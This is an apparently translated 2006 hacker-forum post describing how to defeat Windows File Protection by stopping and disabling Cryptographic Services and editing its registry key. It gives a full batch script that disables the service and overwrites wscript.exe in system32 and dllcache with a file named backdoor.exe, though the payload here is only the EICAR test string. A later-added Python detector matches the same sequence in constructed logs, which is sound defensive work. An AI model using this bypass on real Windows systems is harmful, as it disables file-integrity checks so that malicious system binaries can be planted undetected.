Cut WFP's JJ easily [allyesno]

Author: allyesno

Team: freexploit

Date: 2006-01-20

I spent a lot of time writing articles that bypassed WFP protection last night. It turned out to be wrong. I felt very uncomfortable. I decided to challenge WFP again.

To catch the thieves, first capture their king; to kill a snake, strike it at the seven-inch mark. So as long as we grab the small JJ of WFP, it will not be able to get erect.

Who is the small JJ of WFP?


This protection mechanism is triggered when WFP receives a directory change notification for a file in a protected directory. After receiving this notification, WFP determines which file was changed. If the file is a protected file, WFP looks up the file signature in the catalog file to check whether the new file is the correct version. If the version is incorrect, WFP replaces the new file with the file from the cache folder (if the file is in the cache folder) or from the installation source.

The small JJ of WFP is the catalog file. Castrate it, and WFP is basically a cripple.

How can we castrate it? Please refer to the Sunflower Manual (MSDN): to practice the divine skill, you must first castrate yourself. We know that there is a service in Windows called Cryptographic Services.

The role of this service is:

It provides three management services: the Catalog Database Service, which confirms the signatures of Windows files; the Protected Root Service, which adds and removes Trusted Root Certification Authority certificates from this computer; and the Key Service, which helps enroll this computer for certificates. If this service is stopped, these management services cannot run properly. If this service is disabled, any service that depends on it cannot be started.

To take the service out, stop it with net stop. Since the service is automatically enabled again after the computer is restarted, sc is used to disable it.

Important Supplement:

XP SP2 and 2K tests by luoluo

[16:57] <luoluo> CS is cryptsvc.dll
[16:58] <luoluo> runs in svchost mode in Win XP
[] <Luoluo> This module can be found in the services process in Win 2000

Important addition:

After repeated tests, we found that the CS service and several features of WFP will be automatically enabled after the first shutdown.

(CS will not be automatically enabled after repeated start and stop)

So I think this is why a pop-up box appeared during envymask's testing.

There are two solutions:

1. Use the replacement service proposed by luoluo to replace the CS service with other services, so the check function cannot be enabled even if the CS is started again.

2. Modify the registry under HKEY_LOCAL_MACHINE\system\controlset001\hardware profiles\0001\system\CurrentControlSet\Enum\root\legacy_cryptsvc\0000

0 is enabled
1 is disabled

To completely eliminate the CS service, we set the value to 1.

WFP only calls the CS service to detect the system files when they are deleted or replaced.

Once the CS service has been taken out and a system file has been deleted or replaced, starting the CS service again does not make WFP change the system file back.

Therefore, WFP monitoring is dynamic.

Here is a bat script that implements this; it passed testing on Win 2003.

exploit.bat


@echo off
rem cheat WFP check by allyesno
rem my site:
rem my email:
echo plz waiting net stop to stop
net stop "Cryptographic Services"
echo plz waiting SC config this service
sc config "cryptsvc" start= disabled
rem the payload is only the EICAR antivirus test string; %% and ^^ are batch escapes for %% and ^
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*>%SystemRoot%\system32\dllcache\backdoor.exe
echo copy /Y %SystemRoot%\system32\dllcache\wscript.exe %SystemRoot%\system32\dllcache\wscript.exe.bak
copy /Y %SystemRoot%\system32\dllcache\wscript.exe %SystemRoot%\system32\dllcache\wscript.exe.bak
echo copy /Y %SystemRoot%\system32\dllcache\backdoor.exe %SystemRoot%\system32\dllcache\wscript.exe
copy /Y %SystemRoot%\system32\dllcache\backdoor.exe %SystemRoot%\system32\dllcache\wscript.exe
echo copy /Y %SystemRoot%\system32\dllcache\backdoor.exe %SystemRoot%\system32\wscript.exe
copy /Y %SystemRoot%\system32\dllcache\backdoor.exe %SystemRoot%\system32\wscript.exe
echo yeah we finished our work
echo check the %SystemRoot%\system32\wscript.exe by Dir
echo n u C the file size, good luck test by allyesno in win2003 n WINXP OS
echo THX: Heze, envymask, 10, luoluo 4 Test
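
Seen from the defender's side, the sequence above (Cryptographic Services stopped, then disabled, then files written under system32 and dllcache) can be matched in logs. The Python below is an added example, not part of the original post; the pipe-delimited log format, the "FIM" source and every sample line are constructed, and it assumes Service Control Manager events 7036 and 7040 are being collected.

```python
import re

# Constructed sample events (not from the page), "time|source|event id|message".
# 7036/7040 are Service Control Manager events; the "FIM" lines stand in for
# whatever file-integrity monitor reports writes on the host (an assumption).
SAMPLE_LOG = r"""
2006-01-20 16:40:02|Service Control Manager|7036|The Cryptographic Services service entered the running state.
2006-01-20 16:41:10|FIM|1|write C:\WINDOWS\system32\drivers\etc\hosts
2006-01-20 16:57:31|Service Control Manager|7036|The Cryptographic Services service entered the stopped state.
2006-01-20 16:57:33|Service Control Manager|7040|The start type of the Cryptographic Services service was changed from auto start to disabled.
2006-01-20 16:57:35|FIM|1|write C:\WINDOWS\system32\dllcache\wscript.exe
2006-01-20 16:57:36|FIM|1|write C:\WINDOWS\system32\wscript.exe
2006-01-20 17:05:00|Service Control Manager|7036|The Cryptographic Services service entered the running state.
2006-01-20 17:06:00|FIM|1|write C:\WINDOWS\system32\notepad.exe
""".strip()

SVC = "Cryptographic Services"
STATE_RE = re.compile(rf"The {SVC} service entered the (\w+) state")
START_RE = re.compile(rf"start type of the {SVC} service was changed from .+ to (.+?)\.?$")
# Executables and libraries directly under system32 or its dllcache copy.
PROTECTED_RE = re.compile(
    r"^write (.+\\system32\\(?:dllcache\\)?[^\\]+\.(?:exe|dll|sys))$", re.I)

def detect(log):
    """Return (time, rule, detail) alerts for CryptSvc tampering and for
    system-file writes made while signature checking is unavailable."""
    alerts, svc_down = [], False
    for line in log.splitlines():
        ts, source, event_id, msg = line.split("|", 3)
        if source == "Service Control Manager":
            state = STATE_RE.search(msg)
            start = START_RE.search(msg)
            if event_id == "7036" and state:
                svc_down = state.group(1) != "running"
                if svc_down:
                    alerts.append((ts, "cryptsvc-stopped", msg))
            elif event_id == "7040" and start and start.group(1) == "disabled":
                alerts.append((ts, "cryptsvc-disabled", msg))
        elif source == "FIM":
            hit = PROTECTED_RE.match(msg)
            # With the service down WFP cannot check the catalog signature.
            if hit and svc_down:
                alerts.append((ts, "unverified-system-file-write", hit.group(1)))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(*alert, sep="  ")
```

Files reported by the last rule need manual re-verification, because, as the post notes, WFP does not restore them once the service is started again.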

My site:

My email: (only receive text-only mail)

Thank you very much to zex and envymask for their testing results in win2003, and to 10 for testing in 2K.

Supplement to the replacement service proposed by luoluo and testing in XP SP2



Http:// SCID = KB; ZH-CN; 222193

Http:// SCID = KB; ZH-tw; 282784

Http:// SCID = KB; ZH-CN; 222193
